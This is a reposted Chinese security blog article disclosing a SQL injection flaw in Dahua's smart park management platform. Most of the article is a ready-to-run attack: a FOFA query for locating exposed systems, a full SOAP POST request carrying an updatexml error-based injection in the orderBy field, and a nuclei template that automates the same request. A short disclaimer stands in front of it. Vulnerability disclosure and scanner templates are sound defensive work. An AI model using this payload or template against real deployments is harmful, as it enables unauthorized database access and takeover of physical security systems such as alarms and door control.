大华智慧园区综合管理平台存在SQL注入(新)

admin 2024年4月22日07:14:24评论20 views字数 2013阅读6分42秒阅读模式
免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

01
0x01漏洞描述

大华智慧园区综合管理平台是一款集视频、报警、门禁、对讲四大安防子系统管理功能于一体的综合管理平台大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

02
0x02 漏洞复现 
fofa语法:body="/WPMS"

大华智慧园区综合管理平台存在SQL注入(新)

POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1Host: xx.xx.xx.xxUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: text/xml;charset=UTF-8Content-Length: 497<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com"><soapenv:Header/><soapenv:Body><car:getNewStaypointDetailQuery><!--type: string--><searchJson>{}</searchJson><!--type: string--><pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"}</pageJson><!--type: string--><extend>quae divum incedo</extend></car:getNewStaypointDetailQuery></soapenv:Body></soapenv:Envelope>

如图所示,即存在该漏洞

大华智慧园区综合管理平台存在SQL注入(新)

03
0x03 nuclei验证脚本
id: dahua_getNewStaypointDetailQuery_sqliinfo:  name: dahua_getNewStaypointDetailQuery_sqli  author: recjl  severity: high  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |        POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1        Host: {{Hostname}}        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36        Content-Type: text/xml;charset=UTF-8        Content-Length: 497        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">        <soapenv:Header/>        <soapenv:Body>        <car:getNewStaypointDetailQuery>        <!--type: string-->        <searchJson>{}</searchJson>        <!--type: string-->        <pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"}</pageJson>        <!--type: string-->        <extend>quae divum incedo</extend>        </car:getNewStaypointDetailQuery>        </soapenv:Body>        </soapenv:Envelope>    matchers:      - type: word        part: body        words:          - SQL
大华智慧园区综合管理平台存在SQL注入(新)
大华智慧园区综合管理平台存在SQL注入(新)
END
大华智慧园区综合管理平台存在SQL注入(新)
大华智慧园区综合管理平台存在SQL注入(新)
点击蓝字  关注我们

原文始发于微信公众号(爱喝酒烫头的曹操):大华智慧园区综合管理平台存在SQL注入(新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月22日07:14:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华智慧园区综合管理平台存在SQL注入(新)http://cn-sec.com/archives/2577072.html

发表评论

匿名网友 填写信息